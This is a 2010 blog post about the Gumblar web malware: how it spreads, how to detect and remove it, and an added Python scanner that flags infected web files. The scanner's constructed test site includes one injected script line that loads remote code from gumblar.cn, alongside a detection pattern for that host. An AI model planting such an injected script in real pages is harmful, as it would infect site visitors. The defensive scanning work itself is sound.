Tuesday, April 20, 2010

Gumblar - The latest Global WebThreat

The newest virus attacking networked computers is "Gumblar", also known as "Geno", the latest high-profile virus to infect computers.

According to the IBM Internet Security Systems website, Gumblar is a botnet that infects traditionally non-malicious web servers in order to infect the computers of users who visit the compromised websites. The Gumblar virus attacks PCs through vulnerabilities in some versions of Adobe's PDF Reader and Flash Player software.

MODUS OPERANDI :

This virus is a particularly insidious one, with a multi-phased attack. After infecting a machine, Gumblar installs a series of malware programs, including a small application capable of stealing FTP credentials. With those credentials it can gain control of an entire website and operate it freely.
Gumblar steals FTP passwords from web designers and site managers, then uses them to connect to website servers and edit .html, .php and .js pages, adding a few extras of its own. It targets index files, creates files in image directories, and even modifies webalizer and awstats files given the chance; these are likely to be the backdoors. Once Gumblar has infected a web server, the website on that server becomes a carrier and spreads the virus to new computers. Anyone browsing to an infected website can pick up the virus, which exploits vulnerabilities in Adobe Flash and Adobe Reader to install itself on the PC.
Once it infects a PC, the Gumblar virus silently redirects the victim's Google search results to websites that inject malware. Reportedly, the Gumblar virus targets Google users, and the updated version is said to have been tweaked to infect users of the Google Chrome browser more efficiently.
Gumblar also monitors the infected user's online activity and waits for the user to conduct Google searches. The malware hijacks the search results, replacing them with any link of its choice and further infecting the computer with malware. The virus also installs a fake antivirus program known as "System Security 2009" and disables any legitimate security software.

DETECTION :

Detection of the Gumblar malware may be done by identifying malicious scripts. Web pages that are infected by the Gumblar PC virus have a script that looks like this:





Infected websites each have their own modification of the script, but these modifications have common parts that can be identified as the gumblar.cn script.


REMEDY :

US-CERT has already issued a statement about the Gumblar malware and encourages users to use updated software and antivirus programs.


Unmaskparasites.com provides Gumblar removal instructions and recommends scanning for spyware using programs such as the malware removal tool Malwarebytes. Remove all the malicious code that has been inserted into the server files (.html, .php, .js, etc.) and change the FTP passwords from a clean computer.


Other remedial actions which the user can take are :

1. Be sure to install updates for Microsoft® products.
Use Microsoft Update with automatic updating enabled, from the Microsoft Update site.

2. Install the latest versions of Macromedia Flash and Adobe Acrobat Reader.

3. Maintain STRONG passwords.
Use passwords which are ALPHANUMERIC and not less than 8 characters long.

4. Have strong antivirus software and update it regularly.

5. Avoid unknown links from sites.

PATCHES :

To fix this you could use these patches:

1. For Adobe Reader :  http://www.adobe.com/support/security/
2. For Adobe FlashPlayer : http://get.adobe.com/flashplayer/

DETECTION :

Until a few days ago the only antivirus able to detect the virus was Avast. You can download the latest version at: http://www.avast.com/eng/download-avast-home.html


FIX IT :

Firstly, find another computer that is not infected. Go to your host's control panel and change the password. If you are running a database-driven site, change your database user passwords too. Back up your database; it is not clear at the moment whether the database is at risk. Then, the safest option is to delete everything in your public_html directory (or equivalent) plus the HTML files in the tmp/webalizer and tmp/awstats directories.
On your computer, install Avast and update Windows. If you struggle to get to the website, that is the virus blocking you: download from another PC, copy to removable media, then install from there. Update and run it, run it again in safe mode, clear your temp data (CCleaner has always been handy for this) and run it once more. Make sure your PC is clear. Reboot and run again (in case the pesky virus hides and returns on reboot). Ah, before doing all that, disable Windows System Restore and ensure all restore points are trashed (this should be automatic).
When your computer is clear, you should be ok. As a precaution, delete all FTP passwords from all applications (even the ones you forgot about or tested years ago). I suggest that webmasters stop saving FTP data on their PCs completely. Better safe than very, very sorry. Remember, Dreamweaver, link crawlers and sitemap generators, photo editors, album creators and even some notepad tools (like PSPad) store FTP information.
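The DETECTION section above says infected pages carry a script with common parts pointing at gumblar.cn, and the FIX IT section says to look at web files in image directories and HTML planted in tmp/webalizer and tmp/awstats. The following added example (not from the original post or any vendor) is a small triage scanner that walks a web root and reports those three indicators so a webmaster can review the files before cleaning up. The regexes, directory names and the sample site it builds are this example's own assumptions and constructed data, not a published signature or a real infection capture.

```python
import os
import re
import tempfile

# Indicators taken from the write-up: injected <script> blocks that reference
# gumblar.cn, web/script files dropped into image directories, and HTML files
# planted in webalizer/awstats directories. These patterns are an assumption
# made for this example, an approximation of the post's descriptions.
WEB_EXTS = {".html", ".htm", ".php", ".js"}
IMAGE_DIRS = {"images", "img", "image", "pics"}
STATS_DIRS = {"webalizer", "awstats"}
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
SUSPECT_HOST = re.compile(r"gumblar\s*\.\s*cn", re.I)  # tolerate spacing tricks


def scan_content(text):
    """Return the <script> blocks in one page that reference the suspect host."""
    return [m.group(0) for m in SCRIPT_BLOCK.finditer(text)
            if SUSPECT_HOST.search(m.group(0))]


def scan_tree(root):
    """Walk a web root and return sorted (relative path, reason) pairs to review."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        parts = set() if rel_dir == "." else set(rel_dir.lower().split(os.sep))
        for name in filenames:
            ext = os.path.splitext(name)[1].lower()
            rel = os.path.normpath(os.path.join(rel_dir, name))
            if parts & IMAGE_DIRS and ext in WEB_EXTS:
                findings.append((rel, "web/script file inside an image directory"))
            if parts & STATS_DIRS and ext in {".html", ".htm"}:
                findings.append((rel, "HTML file inside a webalizer/awstats directory"))
            if ext in WEB_EXTS:
                with open(os.path.join(dirpath, name), encoding="utf-8",
                          errors="replace") as fh:
                    hits = scan_content(fh.read())
                if hits:
                    findings.append((rel, f"{len(hits)} script block(s) referencing gumblar.cn"))
    return sorted(findings)


def build_sample_site():
    """Constructed sample web root for an offline run (not a real infection capture)."""
    root = tempfile.mkdtemp(prefix="gumblar-demo-")
    files = {
        # constructed: a clean page with an appended script that names the host
        "index.html": "<html><body><p>hello</p></body></html>\n"
                      "<script>document.write(unescape('%3Cscript src=http://gumblar.cn/rss/?id=1%3E'))</script>",
        "about.html": "<html><body><p>clean page</p><script src='/js/app.js'></script></body></html>",
        "js/app.js": "console.log('legit');",
        "images/logo.png": "\x89PNG fake bytes",
        "images/image.php": "<?php echo 'dropped file'; ?>",
        "tmp/webalizer/index.html": "<html>planted</html>",
        "tmp/webalizer/usage.png": "\x89PNG",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, reason in scan_tree(build_sample_site()):
        print(f"{rel}: {reason}")
```

Run it against a copy of the site taken from a clean machine; the output is a review list, not an automatic cleaner, because a legitimate webalizer index.html and a dropped one look alike to a file walker and only a human comparison with a known-good backup settles it.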


MUST READ THE REPORT :

http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/




REFERENCES :


http://blog.scansafe.com/
http://www.iss.net/threats/gumblar.html
http://www.guardian.co.uk/technology/2009/may/22/gumblar-google-malware
http://www.cbsnews.com/stories/2009/05/29/tech/cnettechnews/main5047992.shtml?source=RSSattr=SciTech_5047992
